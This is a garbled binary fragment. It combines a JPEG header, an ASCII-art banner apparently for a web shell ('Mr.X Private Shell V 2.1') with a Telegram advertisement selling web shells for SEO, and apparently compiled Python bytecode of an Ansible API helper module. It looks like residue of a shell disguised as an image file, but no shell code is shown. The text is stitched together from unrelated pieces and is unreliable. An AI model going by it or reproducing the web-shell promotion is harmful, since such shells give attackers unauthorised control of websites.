����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
a
�)g� � @ s� d Z ddlmZmZmZ eZddlZddlZddl Z ddl
Z
ddlZddlZddl
m m mZ ddd�Zddd�Zddd �Zdd
d�Zdd
d�Zddd�Zdd� Zddd�ZdS )a�
This module adds shared support for generic api modules
In order to use this module, include it as part of a custom
module as shown below.
The 'api' module provides the following common argument specs:
* rate limit spec
- rate: number of requests per time unit (int)
- rate_limit: time window in which the limit is applied in seconds
* retry spec
- retries: number of attempts
- retry_pause: delay between attempts in seconds
� )�absolute_import�division�print_functionNc C s* t t dd�t dd�d�}| r&|�| � |S )z7Creates an argument spec for working with rate limiting�int��type)�rate�
rate_limit��dict�update��specZarg_spec� r �</usr/lib/python3.9/site-packages/ansible/module_utils/api.py�rate_limit_argument_spec'